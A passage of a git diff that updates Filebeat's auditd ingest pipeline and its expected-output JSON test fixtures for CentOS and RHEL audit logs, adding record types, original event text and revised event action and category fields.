auditd.log.sub_kv + - auditd.log.epoch + - auditd.log.copy + ignore_failure: true + ignore_missing: true on_failure: - set: field: error.message diff --git a/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json b/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json index c9d2b77a6e4d..8debfbba37fe 100644 --- a/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json @@ -5,15 +5,25 @@ "auditd.log.kernel": "3.10.0-1062.9.1.el7.x86_64", "auditd.log.node": "localhost.localdomain", "auditd.log.op": "start", + "auditd.log.record_type": "DAEMON_START", "auditd.log.sequence": 4686, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:auditd_t:s0", "auditd.log.ver": "2.8.5", - "event.action": "daemon_start", + "event.action": [ + "started-audit" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=DAEMON_START msg=audit(1594053514.588:4686): op=start ver=2.8.5 format=raw kernel=3.10.0-1062.9.1.el7.x86_64 auid=4294967295 pid=1643 uid=0 ses=4294967295 subj=system_u:system_r:auditd_t:s0 res=success", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 0, @@ -27,16 +37,21 @@ "auditd.log.audit_backlog_limit": "8192", "auditd.log.node": "localhost.localdomain", "auditd.log.old": "64", + "auditd.log.record_type": "CONFIG_CHANGE", "auditd.log.sequence": 4, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:unconfined_service_t:s0", - "event.action": "config_change", + "event.action": [ + "changed-audit-configuration" + ], "event.category": [ + "process", "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=CONFIG_CHANGE msg=audit(1594053514.707:4): audit_backlog_limit=8192 old=64 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 res=1", "event.outcome": "1", "event.type": [ "change" @@ -52,16 +67,21 @@ "auditd.log.audit_failure": "1", "auditd.log.node": "localhost.localdomain", "auditd.log.old": "1", + "auditd.log.record_type": "CONFIG_CHANGE", "auditd.log.sequence": 5, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:unconfined_service_t:s0", - "event.action": "config_change", + "event.action": [ + "changed-audit-configuration" + ], "event.category": [ + "process", "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=CONFIG_CHANGE msg=audit(1594053514.707:5): audit_failure=1 old=1 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 res=1", "event.outcome": "1", "event.type": [ "change" @@ -75,15 +95,25 @@ { "@timestamp": "2020-07-06T16:38:34.709Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 6, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "auditd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.709:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 606, @@ -97,14 +127,18 @@ { "@timestamp": "2020-07-06T16:38:34.725Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SYSTEM_BOOT", "auditd.log.sequence": 7, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_boot", + "event.action": [ + "booted-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SYSTEM_BOOT msg=audit(1594053514.725:7): pid=1667 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -120,15 +154,25 @@ { "@timestamp": "2020-07-06T16:38:34.739Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 8, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-update-utmp", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.739:8): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-update-utmp comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1132, @@ -142,15 +186,25 @@ { "@timestamp": "2020-07-06T16:38:34.807Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 9, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "rngd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.807:9): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=rngd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1401, @@ -164,15 +218,25 @@ { "@timestamp": "2020-07-06T16:38:34.843Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 10, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "irqbalance", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.843:10): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1655, @@ -186,15 +250,25 @@ { "@timestamp": "2020-07-06T16:38:34.850Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 11, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "abrtd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.850:11): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=abrtd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1916, @@ -208,15 +282,25 @@ { "@timestamp": "2020-07-06T16:38:34.857Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 12, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "abrt-xorg", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.857:12): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=abrt-xorg comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2172, diff --git a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json index d3c3a6561ab2..215c0bf11f91 100644 --- a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json @@ -2,13 +2,24 @@ { "@timestamp": "2017-03-14T19:20:30.178Z", "auditd.log.op": "PAM:session_close", + "auditd.log.record_type": "USER_END", "auditd.log.sequence": 19600327, "auditd.log.ses": "11988", - "event.action": "user_end", + "auditd.log.uid": "0", + "event.action": [ + "ended-session" + ], + "event.category": [ + "session" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_END msg=audit(1489519230.178:19600327): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:session_close acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "end" + ], "fileset.name": "log", "input.type": "log", "log.offset": 0, @@ -16,19 +27,31 @@ "process.pid": 4121, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { "@timestamp": "2017-03-14T19:20:30.178Z", "auditd.log.op": "PAM:setcred", + "auditd.log.record_type": "CRED_DISP", "auditd.log.sequence": 19600328, "auditd.log.ses": "11988", - "event.action": "cred_disp", + "auditd.log.uid": "0", + "event.action": [ + "disposed-credentials" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRED_DISP msg=audit(1489519230.178:19600328): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 189, @@ -36,18 +59,29 @@ "process.pid": 4121, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { "@timestamp": "2017-03-14T19:20:56.192Z", + "auditd.log.record_type": "USER_CMD", "auditd.log.sequence": 19600329, "auditd.log.ses": "11988", - "event.action": "user_cmd", + "event.action": [ + "ran-command" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd=\"/\" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 373, @@ -66,13 +100,24 @@ { "@timestamp": "2017-03-14T19:20:56.193Z", "auditd.log.op": "PAM:setcred", + "auditd.log.record_type": "CRED_ACQ", "auditd.log.sequence": 19600330, "auditd.log.ses": "11988", - "event.action": "cred_acq", + "auditd.log.uid": "0", + "event.action": [ + "acquired-credentials" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRED_ACQ msg=audit(1489519256.193:19600330): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 620, @@ -80,19 +125,31 @@ "process.pid": 4151, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { "@timestamp": "2017-03-14T19:20:56.193Z", "auditd.log.op": "PAM:session_open", + "auditd.log.record_type": "USER_START", "auditd.log.sequence": 19600331, "auditd.log.ses": "11988", - "event.action": "user_start", + "auditd.log.uid": "0", + "event.action": [ + "started-session" + ], + "event.category": [ + "session" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_START msg=audit(1489519256.193:19600331): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 803, @@ -100,7 +157,8 @@ "process.pid": 4151, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { @@ -115,6 +173,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=MAC_IPSEC_EVENT msg=audit(1489519382.529:19600354): op=SPD-add auid=4294967295 ses=4294967295 res=1 src=10.100.0.0 src_prefixlen=16 dst=10.100.4.0 dst_prefixlen=22", "event.outcome": "1", "fileset.name": "log", "input.type": "log", @@ -137,9 +196,16 @@ "auditd.log.syscall": "44", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1489519382.529:19600354): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564ee6d2a0 a2=b8 a3=0 items=0 ppid=1240 pid=1275 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"charon\" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -167,17 +233,29 @@ "auditd.log.new_ses": "12286", "auditd.log.old_auid": "700", "auditd.log.old_ses": "6793", + "auditd.log.record_type": "LOGIN", "auditd.log.sequence": 19623791, - "event.action": "login", + "auditd.log.uid": "0", + "event.action": [ + "changed-login-id-to" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=LOGIN msg=audit(1489636960.072:19623791): pid=28281 uid=0 old auid=700 new auid=700 old ses=6793 new ses=12286", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1524, "process.pid": 28281, "service.type": "auditd", - "user.id": "0" + "user.effective.id": "700", + "user.id": "700" }, { "@timestamp": "2017-03-16T04:02:40.070Z", @@ -186,15 +264,25 @@ "auditd.log.laddr": "107.170.139.210", "auditd.log.lport": 50022, "auditd.log.op": "destroy", + "auditd.log.record_type": "CRYPTO_KEY_USER", "auditd.log.rport": 58994, "auditd.log.sequence": 19623788, "auditd.log.ses": "6793", "auditd.log.spid": "28282", - "event.action": "crypto_key_user", + "event.action": [ + "negotiated-crypto-key" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022 exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1640, @@ -220,15 +308,20 @@ { "@timestamp": "2017-03-16T04:02:40.072Z", "auditd.log.op": "success", + "auditd.log.record_type": "USER_AUTH", "auditd.log.sequence": 19623789, "auditd.log.ses": "6793", - "event.action": "user_auth", + "auditd.log.uid": "0", + "event.action": [ + "authenticated" + ], "event.category": [ "authentication" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=ssh res=success'", "event.outcome": "success", "event.type": [ "info" @@ -252,22 +345,28 @@ "source.geo.region_name": "Virginia", "source.ip": "96.241.146.97", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "admin", + "user.id": "700", "user.name": "admin", "user.terminal": "ssh" }, { "@timestamp": "2017-03-16T04:02:57.804Z", "auditd.log.op": "PAM:authentication", + "auditd.log.record_type": "USER_AUTH", "auditd.log.sequence": 19623807, "auditd.log.ses": "12286", - "event.action": "user_auth", + "auditd.log.uid": "0", + "event.action": [ + "authenticated" + ], "event.category": [ "authentication" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_AUTH msg=audit(1489636977.804:19623807): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:authentication acct=\"root\" exe=\"/bin/su\" hostname=? addr=? terminal=pts/0 res=success'", "event.outcome": "success", "event.type": [ "info" @@ -279,20 +378,32 @@ "process.pid": 28395, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root", "user.terminal": "pts/0" }, { "@timestamp": "2017-03-16T04:02:57.805Z", "auditd.log.op": "PAM:accounting", + "auditd.log.record_type": "USER_ACCT", "auditd.log.sequence": 19623808, "auditd.log.ses": "12286", - "event.action": "user_acct", + "auditd.log.uid": "0", + "event.action": [ + "was-authorized" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_ACCT msg=audit(1489636977.805:19623808): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:accounting acct=\"root\" exe=\"/bin/su\" hostname=? addr=? terminal=pts/0 res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2312, @@ -300,7 +411,8 @@ "process.pid": 28395, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root", "user.terminal": "pts/0" } diff --git a/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json b/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json index 4d14263e10f3..bd48d147b0cb 100644 --- a/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json @@ -3,14 +3,24 @@ "@timestamp": "2016-12-07T02:16:23.819Z", "auditd.log.format": "raw", "auditd.log.kernel": "3.10.0-327.36.3.el7.x86_64", + "auditd.log.record_type": "DAEMON_START", "auditd.log.sequence": 7798, "auditd.log.subj": "system_u:system_r:auditd_t:s0", "auditd.log.ver": "2.4.1", - "event.action": "daemon_start", + "event.action": [ + "started-audit" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=DAEMON_START msg=audit(1481076983.819:7798): auditd start, ver=2.4.1 format=raw kernel=3.10.0-327.36.3.el7.x86_64 auid=4294967295 pid=251 subj=system_u:system_r:auditd_t:s0 res=success", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 0, @@ -20,15 +30,25 @@ }, { "@timestamp": "2016-12-07T02:16:23.864Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 6, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "auditd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076983.864:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 190, @@ -41,14 +61,18 @@ }, { "@timestamp": "2016-12-07T02:16:23.876Z", + "auditd.log.record_type": "SYSTEM_BOOT", "auditd.log.sequence": 7, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_boot", + "event.action": [ + "booted-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSTEM_BOOT msg=audit(1481076983.876:7): pid=273 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -63,15 +87,25 @@ }, { "@timestamp": "2016-12-07T02:16:23.879Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 8, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-update-utmp", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076983.879:8): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-update-utmp comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 661, @@ -84,15 +118,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.075Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 9, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-hwdb-update", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.075:9): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-hwdb-update comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 903, @@ -105,15 +149,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.088Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 10, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-update-done", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.088:10): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-update-done comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1145, @@ -126,15 +180,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.163Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 11, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-udev-trigger", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.163:11): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-udev-trigger comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1388, @@ -147,15 +211,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.212Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 12, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "irqbalance", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.212:12): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1632, @@ -168,15 +242,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.521Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 13, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "avahi-daemon", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.521:13): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=avahi-daemon comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1866, @@ -189,15 +273,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.521Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 14, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "dbus", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.521:14): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=dbus comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2102, @@ -210,15 +304,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.526Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 15, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "rsyslog", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.526:15): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=rsyslog comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2330, @@ -231,15 +335,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.534Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 16, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "irqbalance", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076984.534:16): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2561, @@ -254,15 +368,19 @@ "@timestamp": "2016-12-07T02:16:24.827Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 17, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.827:17): table=filter family=2 entries=0", "event.type": [ "change" ], @@ -285,9 +403,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.827:17): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=390 pid=391 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -312,15 +437,19 @@ 